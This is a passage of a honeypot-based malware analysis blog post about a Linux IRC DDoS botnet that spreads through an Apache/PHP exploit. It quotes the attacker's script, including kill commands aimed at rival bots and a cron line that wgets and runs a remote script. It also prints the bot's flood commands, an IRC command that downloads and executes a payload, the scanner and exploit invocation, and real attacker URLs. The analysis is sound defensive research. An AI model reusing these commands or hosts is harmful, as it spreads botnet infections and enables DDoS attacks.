killall -9 .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w php
killall -9 .rnd
killall -9 .a
killall -9 kernelupdate
killall -9 dev
killall -9 sh
killall -9 bash
killall -9 apache2
killall -9 httpd
killall -9 cla
killall -9 ka
killall -9 kav
killall -9 m32
killall -9 m64
killall -9 perl
killall -9 sh
killall -9 sucrack
killall -9 m64 m32 minerd32 minerd64 minerd cla qt64 qt32 clover cron sh wget
kill -9 `pidof .rnd`
kill -9 `pidof .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w`
kill -9 `pidof dev`
kill -9 `pidof perl`
kill -9 `pidof m32`
kill -9 `pidof m64`
kill -9 `pidof ka`
kill -9 `pidof kav`
kill -9 `pidof cla`
kill -9 `pidof sh`
kill -9 `pidof sucrack`
echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
rm -rf /tmp/cron
</pre>
The script does a couple of things:<br />
<ul>
<li>Download and execute a file 'shd' </li>
<li>Download and execute files 'ru' and 'rr'</li>
<li>Try to kill 55 processes</li>
</ul>
If we skip ahead a few lines and focus on the "kill"-section. This was for a while a big questionmark for me as it didn't make any clear sense until I checked some of my honeypot logs and found that similar attacks from other actors downloaded and executed bots which had processes with the above names. The actor behind this attack has thereby planned ahead and make sure to kill any known running bots to make sure that there is only one bot running, his own.<br />
<br />
Going back to the first few lines, the script will download and execute <b>'shd'</b> which is a compiled binary [VT: <a href="https://www.virustotal.com/en/file/58b992b81f68870b9cbd46b01f7a8e4eafb45c107ac7bf64e67c07954e6b5f88/analysis/">47640bbafbaef528bc3f3215299b9ed0</a>]. It doesn't take long to get an idea of what this binary does after checking the strings (full list on [<a href="http://pastebin.com/UaiDdNfC">Pastebin</a>]):<br />
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
...<snip>...<br />
<div class="de1">
117.17.242.218</div>
<div class="de2">
NOTICE %s :Unable to comply.</div>
<div class="de1">
/usr/dict/words</div>
<div class="de2">
%s : USERID : UNIX : %s</div>
<div class="de1">
NOTICE %s :GET <host> <save as></div>
<div class="de2">
NOTICE %s :Unable to create socket.</div>
<div class="de1">
http://</div>
<div class="de2">
NOTICE %s :Unable to resolve address.</div>
<div class="de1">
NOTICE %s :Unable to connect to http.</div>
<div class="de2">
GET /%s HTTP/1.0</div>
<div class="de1">
Connection: Keep-Alive</div>
<div class="de2">
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)</div>
<div class="de1">
Host: %s:80</div>
<div class="de2">
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*</div>
<div class="de1">
Accept-Encoding: gzip</div>
<div class="de2">
Accept-Language: en</div>
<div class="de1">
Accept-Charset: iso-8859-1,*,utf-8</div>
<div class="de1">
...<snip>... </div>
<div class="de1">
<div class="de2">
NOTICE %s :MOVE <server></div>
<div class="de1">
NOTICE %s :TSUNAMI <target> <secs>
= Special packeter that wont be blocked by most
firewalls</div>
<div class="de2">
NOTICE %s :PAN <target> <port> <secs>
= An advanced syn flooder that will kill most
network drivers</div>
<div class="de1">
NOTICE %s :UDP <target> <port> <secs> = A udp flooder</div>
<div class="de2">
NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder</div>
<div class="de1">
NOTICE %s :NICK <nick> = Changes the nick of the client</div>
<div class="de2">
NOTICE %s :SERVER <server> = Changes servers</div>
<div class="de1">
NOTICE %s :GETSPOOFS = Gets the current spoofing</div>
<div class="de2">
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet</div>
<div class="de1">
NOTICE %s :DISABLE = Disables all packeting from this client</div>
<div class="de2">
NOTICE %s :ENABLE = Enables all packeting from this client</div>
<div class="de1">
NOTICE %s :KILL = Kills the client</div>
<div class="de2">
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd</div>
<div class="de1">
NOTICE %s :VERSION = Requests version of client</div>
<div class="de2">
NOTICE %s :KILLALL = Kills all current packeting</div>
<div class="de1">
NOTICE %s :HELP = Displays this</div>
<div class="de2">
NOTICE %s :IRC <command> = Sends this command to the server</div>
<div class="de1">
NOTICE %s :SH <command> = Executes a command</div>
<div class="de2">
NOTICE %s :Killing pid %d.</div>
</div>
</div>
<div class="de2">
A couple of things pop out. first is the fact that there is an IP-adress listed <b>'117.17.242.218' </b>and judging by the other strings I would guess that this is an IRC-bot with DDoS-functionality.</div>
<div class="de2">
</div>
<div class="de2">
One of my ad-hoc methods while analysing malware is to always check TCP/80 as it's the most commonly open port on the Internet:</div>
<div class="de2">
<br /></div>
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
$ curl 117.17.242.218<br />
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...<br />
:irc.foonet.com NOTICE AUTH :*** Found your hostname (cached)<br />
ERROR :Closing Link: [<excluded>] (HTTP command from IRC connection (ATTACK?))</div>
<div class="de2">
<br /></div>
<div class="de2">
A channel could be found using strings as well:</div>
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
$ strings shd | grep \#<br />
CL#CP<br />
Gu#1<br />
u#;u<br />
<b>#irc</b><br />
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<br />
|;#o</div>
<div class="de2">
<br /></div>
<div class="de2">
The channel in question is not password-proctected but isn't however listing connected bots, only the bot admin which seems to be changing nickname each time a command is sent to one or more bots.</div>
<div class="de2">
<br /></div>
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
13:23 <@HADHH> !* SH cd /tmp;wget 221.132.37.26/ru.php ; bash ru.php ; rm -rf ru.php<br />
13:23 -!- HADHH is now known as HAD</div>
<div class="de2">
<br /></div>
<div class="de2">
Moving forward with the second and third file <b>'ru' </b>and <b>'rr'</b> which is supposed to be bash-scripts. <b>'rr'</b> however wasn't found on the server, <b>'ru' </b>was [<a href="http://pastebin.com/v7rjWrfe">Pastebin</a>].<br />
<br />
This script is the first step in deploying further spreading as it downloads and runs a scanning tool (pnscan) and the exploit from http://bont.hu/ar/<arch>.tgz and shown in the snippet below:<br />
<br />
<pre class="brush; js"><snip>
<span class="kw1">if</span> <span class="br0">[</span> <span class="sy0">!</span> <span class="re5">-f</span> pnscan <span class="br0">]</span>;<span class="kw1">then</span>
<span class="kw1">case</span> <span class="st0">"<span class="es2">$arch</span>"</span> <span class="kw1">in</span>
<span class="st0">"x86_64"</span><span class="br0">)</span>
<span class="kw2">wget</span> <span class="re5">-q</span> http:<span class="sy0">//</span>bont.hu<span class="sy0">/</span>ar<span class="sy0">/</span><span class="nu0">64</span>.tgz <span class="re5">-O</span> <span class="nu0">64</span>.tgz
<span class="kw2">tar</span> xvzf <span class="nu0">64</span>.tgz
<span class="kw2">rm</span> <span class="re5">-rf</span> <span class="nu0">64</span>.tgz
<span class="sy0">;;</span>
<span class="sy0">*</span>)
<span class="kw2">wget</span> <span class="re5">-q</span> http:<span class="sy0">//</span>bont.hu<span class="sy0">/</span>ar<span class="sy0">/</span><span class="nu0">86</span>.tgz <span class="re5">-O</span> <span class="nu0">86</span>.tgz
<span class="kw2">tar</span> xvzf <span class="nu0">86</span>.tgz
<span class="kw2">rm</span> <span class="re5">-rf</span> <span class="nu0">86</span>.tgz
<span class="sy0">;;</span>
<span class="kw1">esac</span>
<span class="kw1">fi</span>
<span class="kw1"><snip> </span>
</pre>
<div class="de2">
<span class="kw1"><br /></span></div>
<div class="de2">
<span class="kw1">The archives comes with three files each which have identical functionality (only difference in the 'run'-file is a linebreak at the end):</span></div>
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
<span class="kw1">86.tgz</span>
<br />
<div class="de2">
<span class="kw1"><a href="https://www.virustotal.com/en/file/0c30d700e6481a4269ebf03456e2edae84a6098e8f648f5e2e96a3eadb553629/analysis/">c11e9bc5faf9c2f1600f079ccab3387e</a> php <--- Exploit for PHP<br /><a href="https://www.virustotal.com/en/file/cd77eae3ec2b85afd9c99e504b58be0e34de546dbbc86f52fa8512247690e522/analysis/">14e16be30cfe88ae67881b54b12c2cec</a> pnscan <--- Modified version of PnScan [<a href="http://www.lysator.liu.se/~pen/pnscan/">PnScan</a>]<br />bebe8fc81a7c7b19bc80422e7fce04b6 run <--- Run the two above</span></div>
<div class="de2">
<span class="kw1"><br /></span></div>
<div class="de2">
<span class="kw1">64.tgz</span></div>
<div class="de2">
<span class="kw1"><a href="https://www.virustotal.com/en/file/e63d7630975136486107f3d526a1f24ace64bc2ff55155cac6bcbc4b5dabb44c/analysis/">96e2c911b49f825f2faa3bfa9c6f96bd</a> php<br /><a href="https://www.virustotal.com/en/file/e28e762a13d0ccda81567eb4865ae7b3b37952e66682175e85e72855a0db4700/analysis/">212342b3ddd21a534d0dd7df066ee78d</a> pnscan<br />57dbd47859d067f6c4f60d65c486131f run</span></div>
<div class="de2">
<span class="kw1"><br /></span></div>
</div>
<div class="de2">
<span class="kw1">The run-script reveals how the process is initiated but only how pnscan is initiated:</span></div>
<pre class="brush; js"><div class="de2">
<span class="kw1">#!/bin/bash
rand=`echo $((RANDOM%225+2))`
cd /dev/shm
nohup ./pnscan -rApache -w"HEAD / HTTP/1.0\r\n\r\n" $rand.0.0.0/8 80 > /dev/null &</span></div>
</pre>
<div class="de2">
<span class="kw1">I approached this as it would be a standard version of pnscan that would dump the results to file, but as the above script shows, there is no calls to 'php'. So back to static analysis and strings and look for 'php':</span></div>
<div class="de2">
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
<span class="kw1">$ strings pnscan | fgrep php<br />./php --target %s --port 80 --protocol http --reverse-ip 12.8.8.8 --reverse-port 80 &</span></div>
</div>
<div class="de2">
<span class="kw1"><br /></span></div>
<div class="de2">
<span class="kw1">Now that's more like it! Seems to be a modified version of pnscan which calls 'php' if a server is found to be running Apache.</span><br />
<br />
<span class="kw1">At this stage the whole process simply repeats for each vulnerable server. </span><br />
<br />
<b><i><span class="kw1">Other thoughts and facts</span></i></b><br />
<span class="kw1">This particular attack has been running since November judging by <a href="http://humbug.me.uk/linux/trojan.htm">this article</a> and the botnet is still propagating and actively being controlled by the admin. Some things have changed during the time such as names for the scripts and binaries which has been downloaded (old ones still remain though). Some examples (top one being the currently used) [<a href="http://urlquery.net/search.php?q=221.132.37.26&type=string&start=2013-11-17&end=2014-02-15&max=200">urlquery</a>):</span><br />
<br />
<span class="kw1">Initial script </span><span class="kw1"><span class="kw1">(2014-02-15)</span>:</span><br />
<span class="kw1">221.132.37.26/shh - Active</span><br />
<span class="kw1">221.132.37.26/sh - Active</span><br />
<span class="kw1">221.132.37.26/scen - Active</span><br />
<span class="kw1">221.132.37.26/tmp/sh - Inactive</span><br />
<br />
<span class="kw1">IRC-bot (</span><span class="kw1"><span class="kw1">(2014-02-15)</span>: </span><br />
<span class="kw1">221.132.37.26/shd - Active (2014-02-15)</span><br />
<span class="kw1"><span class="kw1">221.132.37.26/shb - Active</span></span><br />
<span class="kw1"><span class="kw1"><span class="kw1"><span class="kw1">221.132.37.26/shc - Active</span></span> </span> </span><br />
<span class="kw1">221.132.37.26/xxx - Inactive</span><br />
<span class="kw1">221.132.37.26/xx - Inactive</span><br />
<span class="kw1">221.132.37.26/x - Inactive</span><br />
<br />
<span class="kw1">Unknown (based on urlquery, all inactive):</span><br />
<span class="kw1">221.132.37.26/CUT_IT_OUT</span><br />
<span class="kw1"><span class="kw1">221.132.37.26/i_see_you</span></span><br />
<span class="kw1"><span class="kw1"><span class="kw1"><span class="kw1">221.132.37.26/in (probably initial script)</span></span></span></span><br />
<br />
<span class="kw1"><span class="kw1"><span class="kw1"><span class="kw1"><b>Honeypot used:</b> </span></span></span></span><br />
<span class="kw1"><span class="kw1"><span class="kw1"><span class="kw1">I've uploaded the script used in capturing this and many similar attempts on Pastebin [<a href="http://pastebin.com/ue0SNiAy">Pastebin</a>].</span></span></span></span><br />
<span class="kw1"><span class="kw1"><span class="kw1"><span class="kw1"> </span></span></span> </span><br />
<b><i><span class="kw1">Links</span></i></b><br />
<span class="kw1">http://blog.michaelhaag.org/2013/12/kaiten-linux-backdoor.html</span><br />
<span class="kw1">http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html </span><br />
<span class="kw1">http://malm0u53.blogspot.se/2013/12/backing-up-new-cis-blog-post.html </span></div>
</div>
<ul>
</ul>
Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0